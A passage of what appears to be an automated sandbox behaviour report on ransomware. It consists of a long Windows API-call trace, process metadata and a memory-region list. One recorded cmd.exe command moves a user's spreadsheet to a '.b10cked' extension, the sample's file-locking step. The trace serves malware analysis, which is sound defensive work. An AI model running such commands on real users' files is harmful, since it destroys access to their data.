lpOverlapped=0x0 | out: lpBuffer=0x1cef58*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] GetFileType (hFile=0x4c) returned 0x1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cefa8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.958] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.958] GetFileType (hFile=0x4c) returned 0x1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceff8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] GetFileType (hFile=0x4c) returned 0x1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf048*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cf048*, lpNumberOfBytesWritten=0x1ce04c*=0x20, lpOverlapped=0x0) returned 1 [0131.959] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.959] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce038 | out: lpNewFilePointer=0x0) returned 1 [0131.959] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.959] ReadFile (in: hFile=0x54, lpBuffer=0x1cee68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce058, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesRead=0x1ce058*=0x200, lpOverlapped=0x0) returned 1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] GetFileType (hFile=0x4c) returned 0x1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] GetFileType (hFile=0x4c) returned 0x1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] GetFileType (hFile=0x4c) returned 0x1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceeb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceeb8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] GetFileType (hFile=0x4c) returned 0x1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef08*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] GetFileType (hFile=0x4c) returned 0x1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cef58*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] GetFileType (hFile=0x4c) returned 0x1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cefa8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.959] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.959] GetFileType (hFile=0x4c) returned 0x1 [0131.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.960] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1ceff8*, lpNumberOfBytesWritten=0x1ce04c*=0x50, lpOverlapped=0x0) returned 1 [0131.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.960] GetFileType (hFile=0x4c) returned 0x1 [0131.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.960] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf048*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cf048*, lpNumberOfBytesWritten=0x1ce04c*=0x20, lpOverlapped=0x0) returned 1 [0131.960] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.960] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce038 | out: lpNewFilePointer=0x0) returned 1 [0131.960] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.960] ReadFile (in: hFile=0x54, lpBuffer=0x1cee68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce058, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesRead=0x1ce058*=0x32, lpOverlapped=0x0) returned 1 [0131.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.960] GetFileType (hFile=0x4c) returned 0x1 [0131.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.960] GetFileType (hFile=0x4c) returned 0x1 [0131.960] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.960] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee68*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x1ce04c, lpOverlapped=0x0 | out: lpBuffer=0x1cee68*, lpNumberOfBytesWritten=0x1ce04c*=0x32, lpOverlapped=0x0) returned 1 [0131.960] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.960] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce038 | out: lpNewFilePointer=0x0) returned 1 [0131.960] _close (_FileHandle=4) returned 0 [0131.960] FindNextFileW (in: hFindFile=0x340e50, lpFindFileData=0x1cf0cc | out: lpFindFileData=0x1cf0cc) returned 0 [0131.961] GetLastError () returned 0x12 [0131.961] FindClose (in: hFindFile=0x340e50 | out: hFindFile=0x340e50) returned 1 [0131.961] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0131.961] _close (_FileHandle=3) returned 0 [0131.961] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.961] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0131.962] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.962] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0131.962] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.962] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0131.962] SetConsoleInputExeNameW () returned 0x1 [0131.962] GetConsoleOutputCP () returned 0x1b5 [0131.962] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.962] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.962] exit (_Code=0) Process: id = "108" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16720" os_pid = "0x990" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11948 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11949 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11950 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11951 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 11952 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11953 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11954 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11955 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11956 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 11957 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12219 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12220 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12221 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12222 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 12223 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 12224 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 12225 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12226 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12227 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12228 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12229 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12230 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12231 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12232 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12233 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 12234 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12235 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12236 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 12237 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 12238 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 12239 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 12240 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 12241 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 12242 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 165 os_tid = 0x98c [0131.887] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fe14 | out: lpSystemTimeAsFileTime=0x28fe14*(dwLowDateTime=0x888ade80, dwHighDateTime=0x1d440a9)) [0131.887] GetCurrentProcessId () returned 0x990 [0131.887] GetCurrentThreadId () returned 0x98c [0131.887] GetTickCount () returned 0x2a015 [0131.887] QueryPerformanceCounter (in: lpPerformanceCount=0x28fe0c | out: lpPerformanceCount=0x28fe0c*=18867661838) returned 1 [0131.888] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0131.888] __set_app_type (_Type=0x1) [0131.888] __p__fmode () returned 0x76b331f4 [0131.888] __p__commode () returned 0x76b331fc [0131.888] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0131.888] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0131.888] GetCurrentThreadId () returned 0x98c [0131.888] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x98c) returned 0x38 [0131.888] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0131.889] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0131.889] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.889] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0131.889] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fda4 | out: phkResult=0x28fda4*=0x0) returned 0x2 [0131.889] VirtualQuery (in: lpAddress=0x28fddb, lpBuffer=0x28fd74, dwLength=0x1c | out: lpBuffer=0x28fd74*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.889] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28fd74, dwLength=0x1c | out: lpBuffer=0x28fd74*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0131.889] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28fd74, dwLength=0x1c | out: lpBuffer=0x28fd74*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0131.889] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28fd74, dwLength=0x1c | out: lpBuffer=0x28fd74*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0131.889] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28fd74, dwLength=0x1c | out: lpBuffer=0x28fd74*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0131.889] GetConsoleOutputCP () returned 0x1b5 [0131.889] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.889] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0131.889] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.889] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0131.889] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.889] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0131.890] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.890] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0131.890] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.890] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0131.890] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.890] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0131.890] GetEnvironmentStringsW () returned 0x3e0168* [0131.890] FreeEnvironmentStringsW (penv=0x3e0168) returned 1 [0131.890] GetEnvironmentStringsW () returned 0x3e0168* [0131.890] FreeEnvironmentStringsW (penv=0x3e0168) returned 1 [0131.890] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ed14 | out: phkResult=0x28ed14*=0x40) returned 0x0 [0131.891] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ed1c, lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x0, lpData=0x28ed20*=0x90, lpcbData=0x28ed18*=0x1000) returned 0x2 [0131.891] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ed1c, lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x4, lpData=0x28ed20*=0x1, lpcbData=0x28ed18*=0x4) returned 0x0 [0131.891] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ed1c, lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x0, lpData=0x28ed20*=0x1, lpcbData=0x28ed18*=0x1000) returned 0x2 [0131.891] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ed1c, lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x4, lpData=0x28ed20*=0x0, lpcbData=0x28ed18*=0x4) returned 0x0 [0131.891] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ed1c, lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x4, lpData=0x28ed20*=0x40, lpcbData=0x28ed18*=0x4) returned 0x0 [0131.891] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ed1c, lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x4, lpData=0x28ed20*=0x40, lpcbData=0x28ed18*=0x4) returned 0x0 [0131.891] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ed1c, lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x0, lpData=0x28ed20*=0x40, lpcbData=0x28ed18*=0x1000) returned 0x2 [0131.891] RegCloseKey (hKey=0x40) returned 0x0 [0131.891] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ed14 | out: phkResult=0x28ed14*=0x40) returned 0x0 [0131.891] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ed1c, lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x0, lpData=0x28ed20*=0x40, lpcbData=0x28ed18*=0x1000) returned 0x2 [0131.891] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ed1c, lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x4, lpData=0x28ed20*=0x1, lpcbData=0x28ed18*=0x4) returned 0x0 [0131.891] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ed1c, lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x0, lpData=0x28ed20*=0x1, lpcbData=0x28ed18*=0x1000) returned 0x2 [0131.891] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ed1c, lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x4, lpData=0x28ed20*=0x0, lpcbData=0x28ed18*=0x4) returned 0x0 [0131.891] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ed1c, lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x4, lpData=0x28ed20*=0x9, lpcbData=0x28ed18*=0x4) returned 0x0 [0131.891] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ed1c, lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x4, lpData=0x28ed20*=0x9, lpcbData=0x28ed18*=0x4) returned 0x0 [0131.891] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ed1c, lpData=0x28ed20, lpcbData=0x28ed18*=0x1000 | out: lpType=0x28ed1c*=0x0, lpData=0x28ed20*=0x9, lpcbData=0x28ed18*=0x1000) returned 0x2 [0131.891] RegCloseKey (hKey=0x40) returned 0x0 [0131.891] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886366 [0131.891] srand (_Seed=0x5b886366) [0131.891] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx.b10cked\"" [0131.891] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\QFL-BV~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\qFL-bVPAqe.xlsx.b10cked\"" [0131.892] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.892] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e18c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0131.892] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0131.892] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0131.892] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.892] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0131.892] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0131.892] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0131.892] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0131.892] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0131.892] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0131.892] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0131.892] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0131.892] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0131.892] GetEnvironmentStringsW () returned 0x3e22b8* [0131.892] FreeEnvironmentStringsW (penv=0x3e22b8) returned 1 [0131.893] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.893] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0131.893] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0131.893] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0131.893] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0131.893] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0131.893] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0131.893] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0131.893] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0131.893] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0131.893] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28fae0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0131.893] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28fae0, lpFilePart=0x28fadc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28fadc*="Desktop") returned 0x18 [0131.893] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0131.893] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f85c | out: lpFindFileData=0x28f85c) returned 0x3dfff8 [0131.893] FindClose (in: hFindFile=0x3dfff8 | out: hFindFile=0x3dfff8) returned 1 [0131.893] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f85c | out: lpFindFileData=0x28f85c) returned 0x3dfff8 [0131.893] FindClose (in: hFindFile=0x3dfff8 | out: hFindFile=0x3dfff8) returned 1 [0131.893] FindFirstFileW (in: 